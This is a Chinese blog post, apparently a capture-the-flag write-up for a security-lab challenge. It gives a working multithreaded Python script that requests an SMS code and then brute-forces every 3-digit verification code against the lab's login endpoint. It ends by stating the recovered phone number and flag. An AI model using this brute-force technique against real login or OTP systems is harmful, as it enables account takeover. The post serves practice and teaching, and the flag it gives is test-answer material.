文章 35
评论 44
浏览 95842
网络安全实验室(脚本区 基情燃烧的岁月)

网络安全实验室(脚本区 基情燃烧的岁月)

思路:暴力破解3位纯数字的验证码
坑:在破解前,需要用脚本模拟点击获取验证码的链接,正如实际情况那样,服务器要先发送验证码,你才能开始输入验证码,否则服务器怎么知道你这验证码是不是正确的呢?

#coding=utf-8
from http import cookies
import requests;
from lxml import etree  #解析html页面的包
import threading
curtask = 100
maxtask = 999
flag = False
lock = threading.Lock()
url = "http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901"
s = requests.session()
r1 = s.get(url)
url3 = "http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/vcode.php"
r = s.post(url=url3,data={
    'getcode':1,
    'mobi':13388886666
})	#模拟获取验证码
def threadrun():
    global curtask, lock,flag
    while not flag:
        lock.acquire()
        mytask = curtask
        curtask = curtask + 1
        lock.release()
        if(mytask > maxtask):
            break
        url2 = "http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/login.php"
        res = s.post(url = url2, data={
                'username':13388886666,
                'vcode':mytask,
                'Login':'submit'
            })
        res.encoding = res.apparent_encoding    #解决中文乱码
        print(str(i) + ": " + res.text)
        if 'vcode' not in res.text:
            flag = True
threadingNum = 50
threadingList = []
for i in range(threadingNum):
    threadingList.append(threading.Thread(target=threadrun))
for i in threadingList:
    i.start()

得到前任电话是:13399999999后,改下脚本里的username继续破解即可

最终flag是LKK8*(!@@sd


标题:网络安全实验室(脚本区 基情燃烧的岁月)
作者:abandon
地址:HTTPS://www.songsci.com/articles/2022/09/08/1662646937833.html

Life Is Like A Boat

取消